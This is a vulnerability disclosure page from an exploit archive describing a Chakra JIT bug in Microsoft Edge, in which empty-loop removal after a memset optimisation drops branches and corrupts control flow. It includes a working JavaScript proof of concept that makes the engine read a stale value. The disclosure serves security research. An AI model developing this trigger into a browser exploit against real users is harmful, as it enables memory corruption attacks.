Microsoft Edge Chakra JIT - BackwardPass::RemoveEmptyLoopAfterMemOp Does not Insert Branches

2018-01-0900:00:00

Google Security Research

0day.today

0.934 High

EPSS

Percentile

98.9%

JSON

Exploit for windows platform in category dos / poc

/*
The optimizations for memory operations may leave empty loops as follows:
 
for (let i = 0; i < arr.length; i++) {
    arr[i] = 0;
}
 
Becomes:
 
Memset(arr, 0, arr.length);
for (let i = 0; i < arr.length; i++) {
    // empty!
}
 
These empty loops will be removed by "BackwardPass::RemoveEmptyLoopAfterMemOp". But this method just removes them without considering branches.
 
Here's what may happen.
 
A:
Memset(arr, 0, arr.length);
 
for (let i = 0; i < arr.length; i++) {
     
}
goto D;  // Actually, this's a "BrGe_I4" instruction in the PoC.
 
C:
...
 
D:
...
 
Becomes:
 
A:
Memset(arr, 0, arr.length);
 
C:
...
 
D:
...
 
So, this may break the control flow.
 
 
PoC:
*/
 
function opt(a, b, always_true = true) {
    a[0] = 1234;
    b[0] = 0;
 
    let arr = a;
    if (always_true) {
        arr = b;
        for (let i = 0; i < arr.length; i++)
            arr[i] = 0;
    }
 
    let val = arr[0];
    if (val) {
        print(val);  // Must be 0, but prints out 1234
        return true;
    }
 
    return false;
}
 
let a = new Uint32Array(1);
let b = new Uint32Array(0x1000);
for (let i = 0; i < 10000; i++) {
    if (opt(a, b)) {
        break;
    }
}

#  0day.today [2018-02-20]  #